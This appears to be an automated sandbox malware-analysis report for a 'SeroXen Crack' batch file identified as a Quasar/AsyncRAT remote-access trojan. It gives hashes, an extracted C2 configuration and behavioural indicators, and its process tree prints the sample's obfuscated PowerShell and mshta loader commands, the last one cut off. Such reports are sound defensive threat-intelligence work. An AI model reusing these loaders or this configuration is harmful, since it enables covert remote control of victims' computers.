asyncrat | deadf947dc6be85497b30473dcd6ab9a711b2e0a02df847c25f8fd15589a9c8b

Resubmissions

28/11/2024, 05:26

241128-f5dh3stlbl 10

28/11/2024, 05:24

27/09/2024, 19:50

20/08/2024, 17:46

11/12/2023, 06:01

Analysis

max time kernel
30s
max time network
53s
platform
windows11-21h2_x64
resource
win11-20231128-en
resource tags

arch:x64arch:x86image:win11-20231128-enlocale:en-usos:windows11-21h2-x64system
submitted
11/12/2023, 06:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SeroXen Crack/SeroXen-install.bat
Size

12.6MB
MD5

898f49c739026123b6a3811fa31abe70
SHA1

31ff6036b40d70d21cb1c4c0163cba0d4c720551
SHA256

78b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f
SHA512

a9aa2bf15db84361f315156ee6386cac49c14c2449a72e2f50b2e0b8d100781019c246c03a38a37d5dfc71a7c1c5451457faba074d1a875cab615ecb8d3e453d
SSDEEP

49152:sW7ldCjqzV0qZpSjVbHDGYxqXTQPJee/X5nerh1gnfFijx6ygGSPlPNEIKlfuK1u:i

Score

10^/10

asyncrat quasar v2.2.5 | seroxen rat spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.5 | SeroXen

kimsoylak.ddns.net:4782

Mutex

2cc9d61f-950d-4f23-b7d5-45d9dda2f256

Attributes

encryption_key
F467D794B2E1081B6AD1EAD5813AFA74F053248D
install_name
.exe
log_directory
$sxr-Logs
reconnect_delay
1

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/4260-73-0x000001DC5DDC0000-0x000001DC5E58A000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 660 created 640	660	SeroXen-install.bat.exe	80

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/4260-73-0x000001DC5DDC0000-0x000001DC5E58A000-memory.dmp	asyncrat

Executes dropped EXE 2 IoCs

pid	Process
660	SeroXen-install.bat.exe
3840	$sxr-mshta.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 660 set thread context of 1472	660	SeroXen-install.bat.exe	87
PID 660 set thread context of 4684	660	SeroXen-install.bat.exe	85

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$sxr-cmd.exe	SeroXen-install.bat.exe
File created	C:\Windows\$sxr-powershell.exe	SeroXen-install.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	SeroXen-install.bat.exe
File created	C:\Windows\$sxr-mshta.exe	SeroXen-install.bat.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	SeroXen-install.bat.exe
File created	C:\Windows\$sxr-cmd.exe	SeroXen-install.bat.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
660	SeroXen-install.bat.exe
660	SeroXen-install.bat.exe
660	SeroXen-install.bat.exe
1472	dllhost.exe
1472	dllhost.exe
4684	dllhost.exe
4684	dllhost.exe
4684	dllhost.exe
4684	dllhost.exe
1472	dllhost.exe
1472	dllhost.exe
660	SeroXen-install.bat.exe
660	SeroXen-install.bat.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	660	SeroXen-install.bat.exe
Token: SeDebugPrivilege	660	SeroXen-install.bat.exe
Token: SeDebugPrivilege	4684	dllhost.exe
Token: SeDebugPrivilege	1472	dllhost.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 4252 wrote to memory of 660	4252	cmd.exe	82
PID 4252 wrote to memory of 660	4252	cmd.exe	82
PID 660 wrote to memory of 1472	660	SeroXen-install.bat.exe	87
PID 660 wrote to memory of 1472	660	SeroXen-install.bat.exe	87
PID 660 wrote to memory of 1472	660	SeroXen-install.bat.exe	87
PID 660 wrote to memory of 1472	660	SeroXen-install.bat.exe	87
PID 660 wrote to memory of 1472	660	SeroXen-install.bat.exe	87
PID 660 wrote to memory of 1472	660	SeroXen-install.bat.exe	87
PID 660 wrote to memory of 1472	660	SeroXen-install.bat.exe	87
PID 660 wrote to memory of 1544	660	SeroXen-install.bat.exe	86
PID 660 wrote to memory of 1544	660	SeroXen-install.bat.exe	86
PID 660 wrote to memory of 1544	660	SeroXen-install.bat.exe	86
PID 660 wrote to memory of 4684	660	SeroXen-install.bat.exe	85
PID 660 wrote to memory of 4684	660	SeroXen-install.bat.exe	85
PID 660 wrote to memory of 4684	660	SeroXen-install.bat.exe	85
PID 660 wrote to memory of 4684	660	SeroXen-install.bat.exe	85
PID 660 wrote to memory of 4684	660	SeroXen-install.bat.exe	85
PID 660 wrote to memory of 4684	660	SeroXen-install.bat.exe	85
PID 660 wrote to memory of 4684	660	SeroXen-install.bat.exe	85
PID 660 wrote to memory of 4684	660	SeroXen-install.bat.exe	85
PID 660 wrote to memory of 4684	660	SeroXen-install.bat.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4252
- C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat.exe
  "SeroXen-install.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SeroXen Crack\SeroXen-install.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:660
- - C:\Windows\SysWOW64\dllhost.exe
    C:\Windows\SysWOW64\dllhost.exe /Processid:{b9d98fef-929d-40ca-b579-1f9e1bad1533}
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4684
- - C:\Windows\SysWOW64\dllhost.exe
    C:\Windows\SysWOW64\dllhost.exe /Processid:{5eaec6c1-5092-4960-bd50-984db92eb67d}
    3⤵
    PID:1544

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:640
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{231d11a8-4531-4815-a128-61829921233e}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1472
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{14c8379d-2f53-499c-b8a1-65f018c7905d}
  2⤵
  PID:4680
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b46cbfe7-f569-4656-ace1-fab2d1e11ea3}
  2⤵
  PID:4492

C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
1⤵
- Executes dropped EXE
PID:3840
- C:\Windows\$sxr-cmd.exe
  "C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%
  2⤵
  PID:2092
- - C:\Windows\$sxr-powershell.exe
    C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))
    3⤵
    PID:4260
  - - C:\Windows\SysWOW64\dllhost.exe
      C:\Windows\SysWOW64\dllhost.exe /Processid:{5ff8693b-986a-4b61-a3f7-89f0c8c8f9aa}
      4⤵
      PID:1660
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4260).WaitForExit();[System.Threading.Thread]::Sleep(5000); function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, 